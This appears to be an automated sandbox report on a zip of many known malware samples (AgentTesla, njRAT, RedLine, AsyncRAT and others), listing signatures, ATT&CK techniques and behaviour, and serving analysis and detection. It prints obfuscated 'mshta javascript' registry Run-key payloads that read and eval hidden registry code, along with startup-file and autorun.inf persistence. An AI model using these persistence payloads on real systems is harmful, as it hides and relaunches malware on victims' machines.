Malware Analysis Report

2024-08-06 15:02

Sample ID 230905-by5lrsch46
Target 2023-09-04.zip
SHA256 5695a75d96e56497ab5f7175d5c1da59a4565df668cb89db774eefbb5bfb6cf5
Tags
upx botnet svchost.exe rat nyan cat lzrd sora vbs09 macro vmprotect pyinstaller pijao 4 sept nanocore mirai njrat agenttesla dcrat redline asyncrat neshta metasploit irata darkcloud strrat fabookie collection discovery evasion keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5695a75d96e56497ab5f7175d5c1da59a4565df668cb89db774eefbb5bfb6cf5

Threat Level: Known bad

The file 2023-09-04.zip was found to be: Known bad.

Malicious Activity Summary

upx botnet svchost.exe rat nyan cat lzrd sora vbs09 macro vmprotect pyinstaller pijao 4 sept nanocore mirai njrat agenttesla dcrat redline asyncrat neshta metasploit irata darkcloud strrat fabookie collection discovery evasion keylogger persistence spyware stealer trojan

Irata payload

Dcrat family

AgentTesla

Detect Fabookie payload

Darkcloud family

RedLine payload

njRAT/Bladabindi

Irata family

Strrat family

Njrat family

Detect Neshta payload

Async RAT payload

Mirai family

Asyncrat family

Neshta family

Fabookie

Nanocore family

DCRat payload

Agenttesla family

Redline family

Metasploit family

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

Looks for VMWare Tools registry key

Suspicious Office macro

Contacts a large (843) amount of remote hosts

Downloads MZ/PE file

Adds policy Run key to start application

Modifies Windows Firewall

UPX packed file

Checks QEMU agent file

Requests dangerous framework permissions

Reads user/profile data of web browsers

VMProtect packed file

Loads dropped DLL

Executes dropped EXE

Uses the VBS compiler for execution

Checks computer location settings

Drops startup file

Checks BIOS information in registry

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Maps connected drives based on registry

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops autorun.inf file

Program crash

Enumerates physical storage devices

Unsigned PE

Detects Pyinstaller

NSIS installer

Office document contains embedded OLE objects

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Creates scheduled task(s)

outlook_win_path

Checks processor information in registry

Delays execution with timeout.exe

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Gathers network information

Suspicious behavior: LoadsDriver

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

outlook_office_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Replication Through Removable Media
T1091
Execution
TA0002
Scripting
T1064
Scheduled Task/Job
T1053
Command and Scripting Interpreter
T1059
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Scripting
T1064
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
Network Service Discovery
T1046
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Replication Through Removable Media
T1091
Collection
TA0009
Data from Local System
T1005
Email Collection
T1114
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2023-09-05 01:36

Signatures

Agenttesla family

agenttesla

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Darkcloud family

darkcloud

Dcrat family

dcrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A

Irata family

irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

Metasploit family

metasploit

Mirai family

mirai

Nanocore family

nanocore

Neshta family

neshta

Njrat family

njrat

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Strrat family

strrat

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Requests dangerous framework permissions

Description Indicator Process Target
Allows an application to read from external storage. android.permission.READ_EXTERNAL_STORAGE N/A N/A
Allows an application to receive SMS messages. android.permission.RECEIVE_SMS N/A N/A
Allows an application to read SMS messages. android.permission.READ_SMS N/A N/A
Allows an application to send SMS messages. android.permission.SEND_SMS N/A N/A
Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. android.permission.READ_PHONE_STATE N/A N/A
Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call. android.permission.CALL_PHONE N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Office document contains embedded OLE objects

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-05 01:34

Reported

2023-09-05 02:08

Platform

win10v2004-20230831-en

Max time kernel

528s

Max time network

1679s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-09-04.zip

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

njRAT/Bladabindi

trojan njrat

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:yBWN8txbc=\"Wt\";w6P=new%20ActiveXObject(\"WScript.Shell\");Y61yJkLW=\"1ua1yH8jy\";BW18iC=w6P.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");xdZC6lK3=\"vAgwnU8TK\";eval(BW18iC);DoCczC1h=\"WHM2y5Pes\";" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\svchost.exe N/A

Contacts a large (843) amount of remote hosts

discovery

Downloads MZ/PE file

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .." C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .." C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\"" C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yrUCfsab1=\"nvnujP\";uq31=new%20ActiveXObject(\"WScript.Shell\");qUz4oja=\"WRL\";Z1ekW0=uq31.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");Rk0gQjh5fa=\"Yz6RH65\";eval(Z1ekW0);oaF7HEzr3I=\"0iPOPSc8J\";" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:zFq6OsWG6=\"fiBlM\";uC0=new%20ActiveXObject(\"WScript.Shell\");b4gyFzc=\"dIvGD\";tBD2i2=uC0.RegRead(\"HKCU\\\\software\\\\e2e0f7a1\\\\84488b81\");Z6SwqRE2=\"i4bYu4g\";eval(tBD2i2);WxDaBAS8b=\"VbZ2yA\";" C:\Windows\SysWOW64\svchost.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A api.ipify.org N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\svchost.exe N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
